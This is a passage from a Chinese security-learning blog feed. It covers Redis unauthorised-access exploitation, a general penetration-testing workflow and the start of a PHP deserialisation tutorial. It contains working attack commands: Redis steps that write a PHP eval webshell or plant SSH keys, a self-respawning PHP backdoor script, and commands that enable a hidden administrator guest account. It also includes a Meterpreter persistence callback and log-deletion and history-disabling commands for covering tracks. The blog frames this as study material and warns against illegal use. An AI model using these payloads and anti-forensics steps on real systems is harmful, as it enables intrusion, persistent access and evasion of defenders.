title="Redis"></a>Redis</h4><ul><li><p>原理:</p><ul><li>redis默认是没有密码验证的,可以免密码登录操作,攻击者可以通过操作redis进一步控制服务器</li><li>Redis未授权访问在4.x/5.0.5以前版本下,可以使用master/slave模式加载远程模块,通过动态链接库的方式执行任意命令。</li></ul></li><li><p>利用:</p><ul><li><p>写webshell</p><ul><li><p>利用前提:</p><ol><li><p>靶机redis链接未授权,在攻击机上能用redis-cli连上, 并未登陆验证</p></li><li><p>开了web服务器,并且知道路径, 需要具有文件读写增删改查权限</p></li></ol></li><li><p>上传webshell</p><div class="language-sh"><button title="Copy code" class="copy"></button><span class="lang">sh</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #FFCB6B">config</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">get</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">dir</span><span style="color: #BABED8"> </span><span style="color: #676E95; font-style: italic">#查看redis数据库路径</span></span><span class="line"><span style="color: #FFCB6B">config</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">set</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">dir</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">/root/redis-2.8.17#</span><span style="color: #BABED8"> </span><span style="color: #676E95; font-style: italic">#修改靶机Redis数据库路径</span></span><span class="line"><span style="color: #FFCB6B">config</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">set</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">dbfilename</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">22</span><span style="color: #C3E88D">.php</span><span style="color: #BABED8"> </span><span style="color: #676E95; font-style: italic">#生成22.php文件</span></span><span class="line"><span style="color: #82AAFF">set</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">xxx</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">\r\n\r\n<?php phpinfo();?>\r\n\r\n</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">#将一句话木马写入文件中</span></span><span class="line"><span style="color: #676E95; font-style: italic">#"\r\n\r\n"是换行的意思,用redis写入文件会自带一些版本信息,如果不换行可能导致无法执行。</span></span><span class="line"><span style="color: #82AAFF">set</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">xxx</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">\r\n\r\n<?php eval(</span><span style="color: #BABED8">$_POST</span><span style="color: #C3E88D">[whoami]);?>\r\n\r\n</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">#上传木马可以通过蚁剑连接</span></span><span class="line"><span style="color: #FFCB6B">save#保存</span></span></code></pre></div></li></ul></li><li><p>ssh密钥连接</p><ul><li><p>利用前提:</p><ol><li>root身份运行</li><li>存在/root/.ssh目录</li></ol></li><li><p>将公钥上传到靶机</p><div class="language-sh"><button title="Copy code" class="copy"></button><span class="lang">sh</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #82AAFF">type</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">key.txt</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">|</span><span style="color: #BABED8"> </span><span style="color: #FFCB6B">redis-cli.exe</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">-h</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">192.168</span><span style="color: #C3E88D">.43.141</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">-x</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">set</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">xxx#如果是linux</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">将type换成cat</span></span><span class="line"><span style="color: #676E95; font-style: italic">#将公钥作为value插入到数据库中,key随便啥值。</span></span><span class="line"><span style="color: #FFCB6B">redis-cli.exe</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">-h</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">192.168</span><span style="color: #C3E88D">.43.141</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">config</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">set</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">dir</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">/root/.ssh</span></span><span class="line"><span style="color: #676E95; font-style: italic">#修改redis数据库路径</span></span><span class="line"><span style="color: #FFCB6B">redis-cli.exe</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">-h</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">192.168</span><span style="color: #C3E88D">.43.141</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">config</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">set</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">dbfilename</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">authorized_keys</span></span><span class="line"><span style="color: #676E95; font-style: italic">#生成缓冲文件authorized_keys</span></span><span class="line"><span style="color: #FFCB6B">redis-cli.exe</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">-h</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">192.168</span><span style="color: #C3E88D">.43.141</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">save</span></span><span class="line"><span style="color: #676E95; font-style: italic">#保存</span></span><span class="line"><span style="color: #FFCB6B">ssh</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">-i</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">id_rsa</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">root@192.168.43.141</span></span><span class="line"><span style="color: #676E95; font-style: italic">#连接</span></span></code></pre></div></li></ul></li><li><p>RCE自动化利用脚本<br><a href="https://github.com/vulhub/redis-rogue-getshell">vulhub/redis-rogue-getshell: redis 4.x/5.x master/slave getshell module (github.com)</a></p></li></ul></li></ul><h3 id="常见漏洞汇总"><a href="#常见漏洞汇总" class="headerlink" title="常见漏洞汇总"></a>常见漏洞汇总</h3><ul><li><p><a href="https://www.freebuf.com/articles/web/338459.html">常用的30+种未授权访问漏洞汇总 - FreeBuf网络安全行业门户</a></p></li><li><p><a href="https://mp.weixin.qq.com/s/IK7n5onsyssmJyf5SPpw6A">网络安全周周学 | 常见未授权访问漏洞汇总</a></p></li></ul><h3 id="漏洞防范"><a href="#漏洞防范" class="headerlink" title="漏洞防范"></a>漏洞防范</h3>]]></content>
<summary type="html"><h3 id="漏洞简述"><a href="#漏洞简述" class="headerlink" title="漏洞简述"></a>漏洞简述</h3><h4 id="描述"><a href="#描述" class="headerlink" title="描述"></a>描述</h</summary>
<category term="网络安全" scheme="https://myprefer.github.io/tags/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/"/>
<category term="学习日志" scheme="https://myprefer.github.io/tags/%E5%AD%A6%E4%B9%A0%E6%97%A5%E5%BF%97/"/>
</entry>
<entry>
<title>(转)渗透测试-基本流程</title>
<link href="https://myprefer.github.io/post/%E8%BD%AC-%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-%E5%9F%BA%E6%9C%AC%E6%B5%81%E7%A8%8B.html"/>
<id>https://myprefer.github.io/post/%E8%BD%AC-%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-%E5%9F%BA%E6%9C%AC%E6%B5%81%E7%A8%8B.html</id>
<published>2024-03-21T14:50:33.000Z</published>
<updated>2024-03-21T14:51:34.220Z</updated>
<content type="html"><![CDATA[<p>一般来说,渗透测试的基本流程如下:</p><ol><li>确定目标</li><li>信息收集</li><li>漏洞探测</li><li>漏洞利用getshell</li><li>内网转发</li><li>内网渗透</li><li>痕迹清除</li><li>撰写渗透测试报告</li></ol><h2 id="一-确定目标"><a href="#一-确定目标" class="headerlink" title="一 确定目标"></a><strong>一 确定目标</strong></h2><p>这个没什么好说的就是确定你的渗透目标是什么。</p><h2 id="二-信息收集"><a href="#二-信息收集" class="headerlink" title="二 信息收集"></a><strong>二 信息收集</strong></h2><p><strong>信息收集是整个渗透测试中最重要的一步</strong>,你要把你要攻击的目标全部探测清楚,才能更好的攻击。<strong>信息收集的越丰富,内容或情报收集的越多,攻击的成功率就越高。</strong></p><p>而信息收集到底要收集哪些信息呢?接下来,我就给大家整理了一下,渗透测试中常见的一些需要收集的信息。</p><p><strong>1.主机扫描(Nessus)</strong></p><p>对目标主机进行扫描,而不仅仅是对网站进行扫描,扫描目标主机开放了哪些端口,扫描端口运行的服务,目标主机上有哪些漏洞。</p><p>主机扫描的工具也有很多,比如:Nessus</p><p><strong>2.端口扫描(nmap)</strong></p><p>需要知道目标服务器开放了哪些端口,常见的如 135 、137 、138 、139 、445,这几个端口经常爆发漏洞。以下是一些服务端口的漏洞:</p><p>22——>ssh弱口令</p><p>873——>rsync 未授权访问漏洞</p><p>3306——>mysql弱口令</p><p>6379——>redis未授权访问漏洞</p><p>端口扫描工具有nmap和masscan。nmap扫描的准确性较高,但是扫描的比较慢。masscan扫描的比较快,但是准确性较低。</p><p><strong>3.网站敏感目录和文件</strong></p><p>扫描网站目录结构,看看是否可以遍历目录,或者敏感文件泄漏</p><ul><li>后台目录:弱口令,万能密码,爆破</li><li>安装包:获取数据库信息,甚至是网站源码</li><li>上传目录:截断、上传图片马等</li><li>mysql管理接口:弱口令、爆破,万能密码,然后脱裤,甚至是拿到shell</li><li>安装页面 :可以二次安装进而绕过</li><li>phpinfo:会把你配置的各种信息暴露出来</li><li>编辑器:fck、ke、等</li><li>iis短文件利用:条件比较苛刻 windows、apache等</li></ul><p>提到了网站敏感目录我们就不得不提 robots.txt 文件了</p><p>robots.txt 文件是专门针对搜索引擎机器人robot 编写的一个纯文本文件。我们可以在这个文件中指定网站中不想被robot访问的目录。这样,我们网站的部分或全部内容就可以不被搜索引擎收录了,或者让搜索引擎只收录指定的内容。因此我们可</p><p>以利用robots.txt让Google的机器人访问不了我们网站上的重要文件,GoogleHack的威胁也就不存在了。</p><p>假如编写的robots.txt文件内容如下:</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">User-agent: *</span></span><span class="line"><span style="color: #babed8">Disallow: /data/</span></span><span class="line"><span style="color: #babed8">Disallow: /db/</span></span><span class="line"><span style="color: #babed8">Disallow: /admin/</span></span><span class="line"><span style="color: #babed8">Disallow: /manager/</span></span><span class="line"><span style="color: #babed8">Allow:/images/</span></span></code></pre></div><p>其中“Disallow”参数后面的是禁止robot收录部分的路径,例如我们要让robot禁止收录网站目录下的“data”文件夹,只需要在Disallow参数后面加上 /data/ 即可。如果想增加其他目录,只需按此格式继续添加。文件编写完成后将其上传到网站的根目录,就可以让网站远离Google Hack了。</p><p>虽然robots文件目的是让搜索蜘蛛不爬取想要保护的页面,但是如果我们知道了robots文件的内容的话,我们就可以知道目标网站哪些文件夹不让访问,从侧面说明这些文件夹是很重要的了。</p><p>探测目标网站后台目录的工具有:wwwscan 、御剑 、 dirbuster、cansina 等</p><p><strong>4.旁站和C段扫描</strong></p><p>旁站指的是同一服务器上的其他网站,很多时候,有些网站可能不是那么容易入侵。那么,可以查看该网站所在的服务器上是否还有其他网站。如果有其他网站的话,可以先拿下其他网站的webshell,然后再提权拿到服务器的权限,最后就自然可以拿下该网站了!</p><p>对于红蓝对抗和护网,C段扫描比较有意义。对于单独网站的渗透测试,C段扫描意义不大。C段指的是同一内网段内的其他服务器,每个IP有ABCD四个段,举个例子,192.168.0.1,A段就是192,B段是168,C段是0,D段是1,而C段嗅探的意思就是拿下它同一C段中的其中一台服务器,也就是说是D段1-255中的一台服务器,然后利用工具嗅探拿下该服务器。</p><p><strong>5.网站漏洞扫描</strong></p><p>网站漏洞扫描就是直接对网站进行漏洞探测了。网站漏洞扫描也有很多工具。比如 AWVS、AppScan、OWASP-ZAP、nessuss等等。但是需要注意的是,使用漏扫工具直接对网站进行扫描,因为一下子流量过大,有些网站可能会崩溃。所以一般最好不要使用漏洞扫描工具对网站进行扫描。并且如果未经授权就用漏扫对网站进行扫描还是违法的!</p><p><strong>6.网站指纹识别</strong></p><p>在渗透测试中,对目标服务器进行指纹识别是相当有必要的,因为只有识别出相应的Web容器或者CMS,才能查找与其相关的漏洞,然后才能进行相应的渗透操作。CMS又称整站系统。常见的CMS有:WordPress、Dedecms、Discuz、PhpWeb、PhpWind、Dvbbs、PhpCMS、ECShop、、SiteWeaver、AspCMS、帝国、Z-Blog等。</p><p>常见的网站指纹识别工具有:whatweb等。</p><p><strong>7.公司敏感信息网上搜集</strong></p><p>当确定了公司后,我们可以去互联网上查询与该公司有关的任何信息。比如,公司的邮箱格式,公司的员工姓名,以及与该公司有关的任何信息。并且,我们还可以去Github、码云等代码托管平台上查找与此有关的敏感信息,有些粗心的程序员在将代码上传至代码托管平台后,并没有对代码进行脱敏处理。导致上传的代码中有包含如数据库连接信息、邮箱密码、还有可能有泄露的源代码等。</p><p><strong>8.域名信息的收集</strong></p><p>当我们确定了要渗透的目标,也就是知道了其域名,接下来我们需要收集域名对应的 ip,域名的whois信息、子域名等等一系列与域名相关的信息。</p><p>判断域名对应的IP:首先,我们要判断该域名是否存在CDN的情况,我们可以去在线CDN查询网站:多个地点Ping服务器,网站测速 - 站长工具 。如果查询出的ip数量大于一个的话,则说明该ip地址不是真实的服务器地址。以我的经验来看,如果是2个或者3个,并且这几个地址是同一地区的不同运营商的话,则很有可能这几个地址是服务器的出口地址,该服务器在内网中,通过不同运营商NAT映射供互联网访问,同时采用几个不同的运营商可以负载均衡和热备份。如果是多个ip地址,并且这些ip地址分布在不同地区的话,则基本上可以断定就是采用了CDN了。</p><p>域名的whois信息:whois是用来查询域名注册所有者等信息的传输协议。简单说,whois就是一个用来查询域名是否已经被注册,以及注册域名的详细信息的数据库(如域名所有人、域名注册商)。通过whois来实现对域名信息的查询。早期的whois查询多以命令行接口存在,但是现在出现了一些网页接口简化的线上查询工具,可以一次向不同的数据库查询。网页接口的查询工具仍然依赖whois协议向服务器发送查询请求,命令行接口的工具仍然被系统管理员广泛使用。whois通常使用TCP协议43端口。每个域名/IP的whois信息由对应的管理机构保存。</p><h2 id="三-漏洞探测"><a href="#三-漏洞探测" class="headerlink" title="三 漏洞探测"></a>三 漏洞探测</h2><p>当我们收集到了足够多的信息之后,我们就要开始对网站进行漏洞探测了。探测网站是否存在一些常见的Web漏洞,比如:</p><ul><li>SQL注入</li><li>XSS跨站脚本</li><li>CSRF跨站请求伪造</li><li>XXE漏洞</li><li>SSRF服务端请求伪造漏洞</li><li>文件包含漏洞</li><li>文件上传漏洞</li><li>文件解析漏洞</li><li>远程代码执行漏洞</li><li>CORS跨域资源共享漏洞</li><li>越权访问漏洞</li><li>目录浏览漏洞和任意文件读取/下载漏洞</li><li>struts2漏洞</li><li>JAVA反序列化漏洞</li></ul><p>这些是网站经常发现的一些漏洞,还有一些网站漏洞,这里我就不一一列举出来了。</p><p>网站漏洞扫描工具也有很多,比如:</p><ul><li>AWVS</li><li>AppScan</li><li>Owasp-Zap</li><li>Nessus</li></ul><p>网站漏洞扫描工具我就列举这几种,还有很多,最常用的是这几个!</p><h2 id="四-漏洞利用"><a href="#四-漏洞利用" class="headerlink" title="四 漏洞利用"></a>四 漏洞利用</h2><p>当我们探测到了该网站存在漏洞之后,我们就要对该漏洞进行利用了。不同的漏洞有不同的利用工具,很多时候,通过一个漏洞我们很难拿到网站的webshell,我们往往需要结合几个漏洞来拿webshell。常用的漏洞利用工具如下:</p><p>SQL注入 ——> Sqlmap</p><p>XSS跨站脚本——> Beef-XSS</p><p>抓包改包工具——> Burpsuite工具 、 Fidder抓包软件</p><p>文件上传漏洞,上传漏洞的话,我们一般会上传一句话木马上去,进而再获得webshell,传送门——> Webshell和一句话木马</p><p>但是,获得了webshell后,一般权限很低,所以我们需要提权,可以选择反弹一个MSF类型的shell提权:Metasploit Framework(MSF)的使用 、 Msfvenonm生成一个后门木马,也可以反弹一个CobaltStrike类型的shell:渗透测试神器Cobalt Strike的使用, 也可以MSF和CobaltStrike联动:MSF和CobaltStrike联动 也可以使用其他提权:Windows提权 、 Linux提权</p><h2 id="五-内网转发"><a href="#五-内网转发" class="headerlink" title="五 内网转发"></a>五 内网转发</h2><p>当我们获取到了网站的Webshell之后,如果我们想获取该主机的有关信息,我们可以将该主机的webshell换成MSF的shell。直接生成一个木马,然后在菜刀中执行该木马,我们就能接收到一个MSF类型的shell了。</p><p>如果我们还想进一步的探测内网主机的信息的话,我们就需要进行内网转发了。我们是不能直接和内网的主机通信的,所以我们就需要借助获取到的webshell网站的服务器和内网主机进行通信。</p><h2 id="六-内网横向渗透"><a href="#六-内网横向渗透" class="headerlink" title="六 内网横向渗透"></a>六 内网横向渗透</h2><p>当我们在获取了外网服务器的权限,进入该系统后,我们要想尽办法从该服务器上查找到我们想要的信息。</p><p>对于windows主机,我们应该多去翻翻目录,或许能有很多意想不到的结果。很多人习惯把账号密码等容易忘的东西存放在备忘录中,或者是桌面上。我们还可以查找数据库的连接文件,查看数据库的连接账号密码等敏感信息。当我们获得了windows主机的账号密码,或者是自己创建了新用户后,我们为了不被网站管理员发现和不破坏服务器。我们尽量不要使用远程桌面。因为使用远程桌面动静比较大,如果此时服务器管理员也在登录,而你此时通过远程桌面登录的话,会将管理员挤掉,而你也将很快的被管理员踢掉。对于实在是要远程桌面登录的情况的话,我们尽量不要新建一个用户进行登录。我们可以激活 guest 用户,然后将其加入 administrators 组里面,用 guest 用户身份登录。在RDP远程登录后,我们可以查看其他用户桌面上和其他目录有哪些软件,我们要找的目标有以下。</p><ul><li>FTP相关的软件</li><li>数据库相关的软件</li><li>打开浏览器,查看历史记录,查看某些网站是否保存有用户密码。利用工具查看浏览器保存的密码</li></ul><p>从该主机上找到的账号密码,我们可以做一个字典,在对内网其他机器进行爆破的时候,很有可能是同密码。</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">net user guest /active:yes #激活guest用户</span></span><span class="line"><span style="color: #babed8">net localgroup administrators guest /add #将guest用户添加到</span></span><span class="line"><span style="color: #babed8">net user guest 密码 #更改guest用户密码</span></span><span class="line"><span style="color: #babed8">REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f #开启3389端口</span></span></code></pre></div><p>对于Linux主机,我们可以查看开放的端口号,开放的服务,与其建立连接的内网主机。查看目录,查找网站数据库连接密码。总之,就是尽可能的多查找一些账号密码,这对于内网的账号爆破非常有用。</p><p>在搭建了隧道可以通内网后,我们首先就需要对内网进行资产发现了。但是对于内网存活网段的判断是一个大问题。内网很有可能同时存在 10.0.0.0/8、172.16.0.0/16、192.168.0.0/24 网段。这就需要我们用扫描器对其进行探测了。通过代理进行内网扫描不建议使用nmap。如果是在本地主机通过代理扫描,可以图形化界面的话,可以使用 RouterScan 、御剑高速TCP全端口扫描器、IIS_Scanner。但是注意线程调低一点,不然代理很容易崩了。如果使用命令行扫描器的话,可以使用S扫描器。在扫描了内网资产和端口开放情况后,对于445端口,就可以打一波MS17_010。但是注意通过代理打445,和之前的是不一样的。传送门——> 内网渗透之MS17-010 。对于3389端口,可以打一波CVE-2019-0708,传送门——> CVE-2019-0708 远程桌面漏洞复现 。对于1433/3306/6379等端口,可以尝试爆破,利用之前收集到的账号密码成功率更高哦。</p><p><strong>权限维持</strong></p><p>在拿到目标主机的权限后,很有可能当时我们并不能获取到想要的东西,需要进行长期的潜伏,特别是在内网渗透中,需要进行长期的信息收集。这时,权限维持就很重要了。我们需要维持住获得的现有权限。</p><p><strong>Web后门</strong></p><p>1:隐藏后门文件(将文件设置为隐藏)</p><p>2:不死马,该脚本每5秒向服务器创建test.php,并写入一句话免杀木马。结合attrib命令隐藏文件更好地建立后门。</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8"><?php</span></span><span class="line"><span style="color: #babed8"> set_time_limit(0);//程序执行时间</span></span><span class="line"><span style="color: #babed8"> ignore_user_abort(1);//关掉终端后脚本仍然运行</span></span><span class="line"><span style="color: #babed8"> unlink(__FILE__);//文件完整名</span></span><span class="line"><span style="color: #babed8"> while(1){</span></span><span class="line"><span style="color: #babed8"> file_put_contents('test.php','<?php $a=array($_REQUEST["x"]=>"3");</span></span><span class="line"><span style="color: #babed8"> $b=array_keys($a)[0];</span></span><span class="line"><span style="color: #babed8"> eval($b);?>');</span></span><span class="line"><span style="color: #babed8"> sleep(5);</span></span><span class="line"><span style="color: #babed8"> }</span></span><span class="line"><span style="color: #babed8">?></span></span></code></pre></div><p>3:404页面隐藏后门,或者在其他自带文件中插入后门代码</p><p>注:以上几种后门方法均能被D盾等工具检测到</p><p><strong>Windows系统</strong></p><p>1:建立隐藏用户,在用户名后加 $</p><p>2:在开机启动目录下放置木马文件,只要目标机器重启,将回连我们的远控</p><p>3:MSF里的 persistence 模块,执行命令可以使目标机器每隔一定时间自动回连远控。但是容易被发现</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">#反弹时间间隔是5s 会自动连接192.168.27的4444端口,缺点是容易被杀毒软件查杀</span></span><span class="line"><span style="color: #babed8">run persistence -X -i 5 -p 8888 -r 192.168.10.27 </span></span><span class="line"><span style="color: #babed8"> </span></span><span class="line"><span style="color: #babed8">#然后它就在目标机新建了这个文件:C:\Windows\TEMP\CJzhFlNOWa.vbs ,并把该服务加入了注册表中,只要开机就会启动</span></span></code></pre></div><p>4:在域环境下,想办法获得 krbtgt 用户的哈希,该用户的哈希可以进行票据传递攻击。而且一般该用户的密码不经常改变。</p><p>5:shift后门</p><p>6:远程桌面会话劫持</p><p><strong>Linux系统</strong></p><p>1:SSH后门</p><p>2:crontab定时任务</p><p>3:SSH公钥</p><p>4:创建SUID=0的用户</p><h2 id="七-痕迹清除"><a href="#七-痕迹清除" class="headerlink" title="七 痕迹清除"></a>七 痕迹清除</h2><p>当我们达到了目的之后,有时候只是为了黑入网站挂黑页,炫耀一下;或者在网站留下一个后门,作为肉鸡,没事的时候上去溜达溜达;亦或者挂入挖矿木马;但是大家千万不要干这些事,这些都是违法的!</p><p>我这里只是教大家在渗透进去之后如何清除我们留下的一部分痕迹,并不能完全清除,完全清除入侵痕迹是不可能的!主要是增加管理员发现入侵者的时间成本和人力成本。只要管理员想查,无论你怎么清除,还是能查到的。</p><p>最主要还是要以隐藏自身身份为主,最好的手段是在渗透前挂上代理,然后在渗透后痕迹清除。</p><p>Windows系统</p><p>1:如果是windows系统,可用MSF中的 clearev 命令清除痕迹</p><p>2:如果3389远程登录过,需要清除mstsc痕迹</p><p>3:执行命令清除日志:</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">del %WINDR%\* .log /a/s/q/f</span></span></code></pre></div><p>4:如果是web应用,找到web日志文件,删除</p><p>Linux系统</p><p>1:如果是Linux系统,在获取权限后,执行以下命令,不会记录输入过的命令</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">export HISTFILE=/dev/null export HISTSIZE=0</span></span></code></pre></div><p>2:删除 /var/log 目录下的日志文件</p><p>3:如果是web应用,找到web日志文件,删除</p><h3 id="八-撰写渗透测试保告"><a href="#八-撰写渗透测试保告" class="headerlink" title="八 撰写渗透测试保告"></a>八 撰写渗透测试保告</h3>]]></content>
<summary type="html"><p>一般来说,渗透测试的基本流程如下:</p>
<ol>
<li>确定目标</li>
<li>信息收集</li>
<li>漏洞探测</li>
<li>漏洞利用getshell</li>
<li>内网转发</li>
<li>内网渗透</li>
<li>痕迹清除</li>
<li></summary>
</entry>
<entry>
<title>WEB攻防-反序列化</title>
<link href="https://myprefer.github.io/post/WEB%E6%94%BB%E9%98%B2-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96.html"/>
<id>https://myprefer.github.io/post/WEB%E6%94%BB%E9%98%B2-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96.html</id>
<published>2024-03-18T13:45:44.000Z</published>
<updated>2024-04-21T10:30:45.807Z</updated>
<content type="html"><![CDATA[<h1 id="反序列化"><a href="#反序列化" class="headerlink" title="反序列化"></a>反序列化</h1><h4 id="什么是反序列化"><a href="#什么是反序列化" class="headerlink" title="什么是反序列化"></a>什么是反序列化</h4><p><em><strong>格式转换</strong></em></p><ul><li>序列化: 对象转换为数组或字符串等格式</li><li>反序列化: 将数组或字符串等格式转换成对象</li></ul><p><img src="https://i0.imgs.ovh/2024/03/17/e3gfp.png" alt="e3gfp.png"></p><h2 id="PHP反序列化"><a href="#PHP反序列化" class="headerlink" title="PHP反序列化"></a>PHP反序列化</h2><h4 id="漏洞产生原因"><a href="#漏洞产生原因" class="headerlink" title="漏洞产生原因"></a>漏洞产生原因</h4><p><em><strong>魔法方法</strong></em></p><ul><li>触发:unserialize函数的变量可控,文件中存在可利用的类,类中有魔术方法</li></ul><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #82AAFF">__construct</span><span style="color: #89DDFF">():</span><span style="color: #676E95; font-style: italic">//构造函数,当对象new的时候会自动调用</span></span><span class="line"></span><span class="line"><span style="color: #82AAFF">__destruct</span><span style="color: #89DDFF">():</span><span style="color: #676E95; font-style: italic">//析构函数当对象被销毁时会被自动调用</span></span><span class="line"></span><span class="line"><span style="color: #82AAFF">__wakeup</span><span style="color: #89DDFF">():</span><span style="color: #676E95; font-style: italic">//unserialize()时会被自动调用</span></span><span class="line"></span><span class="line"><span style="color: #82AAFF">__invoke</span><span style="color: #89DDFF">():</span><span style="color: #BABED8"> </span><span style="color: #676E95; font-style: italic">//当尝试以调用函数的方法调用一个对象时,会被自动调用</span></span><span class="line"></span><span class="line"><span style="color: #82AAFF">__call</span><span style="color: #89DDFF">():</span><span style="color: #BABED8"> </span><span style="color: #676E95; font-style: italic">//在对象上下文中调用不可访问的方法时触发</span></span><span class="line"></span><span class="line"><span style="color: #82AAFF">__callStatci</span><span style="color: #89DDFF">():</span><span style="color: #BABED8"> </span><span style="color: #676E95; font-style: italic">//在静态上下文中调用不可访问的方法时触发</span></span><span class="line"></span><span class="line"><span style="color: #82AAFF">__get</span><span style="color: #89DDFF">():</span><span style="color: #BABED8"> </span><span style="color: #676E95; font-style: italic">//用于从不可访问的属性读取数据</span></span><span class="line"></span><span class="line"><span style="color: #82AAFF">__set</span><span style="color: #89DDFF">():</span><span style="color: #BABED8"> </span><span style="color: #676E95; font-style: italic">//用于将数据写入不可访问的属性</span></span><span class="line"></span><span class="line"><span style="color: #82AAFF">__isset</span><span style="color: #89DDFF">():</span><span style="color: #BABED8"> </span><span style="color: #676E95; font-style: italic">//在不可访问的属性上调用isset()或empty()触发</span></span><span class="line"></span><span class="line"><span style="color: #82AAFF">__unset</span><span style="color: #89DDFF">():</span><span style="color: #BABED8"> </span><span style="color: #676E95; font-style: italic">//在不可访问的属性上使用unset()时触发</span></span><span class="line"></span><span class="line"><span style="color: #82AAFF">__toString</span><span style="color: #89DDFF">():</span><span style="color: #BABED8"> </span><span style="color: #676E95; font-style: italic">//把类当作字符串使用时触发</span></span><span class="line"></span><span class="line"><span style="color: #82AAFF">__sleep</span><span style="color: #89DDFF">():</span><span style="color: #BABED8"> </span><span style="color: #676E95; font-style: italic">//serialize()函数会检查类中是否存在一个魔术方法__sleep() 如果存在,该方法会被优先调用</span></span></code></pre></div><ul><li>演示:</li></ul><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF"><?</span><span style="color: #BABED8">php</span></span><span class="line"><span style="color: #676E95; font-style: italic">//序列化&反序列化</span></span><span class="line"><span style="color: #C792EA">class</span><span style="color: #BABED8"> </span><span style="color: #FFCB6B">demotest</span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #C792EA">public</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">name</span><span style="color: #89DDFF">=</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">xiaodi</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #C792EA">public</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">sex</span><span style="color: #89DDFF">=</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">man</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #C792EA">public</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">age</span><span style="color: #89DDFF">=</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">29</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #89DDFF">}</span></span><span class="line"><span style="color: #89DDFF">$</span><span style="color: #BABED8">example</span><span style="color: #89DDFF">=</span><span style="color: #F78C6C">new</span><span style="color: #BABED8"> </span><span style="color: #FFCB6B">demotest</span><span style="color: #89DDFF">();</span></span><span class="line"><span style="color: 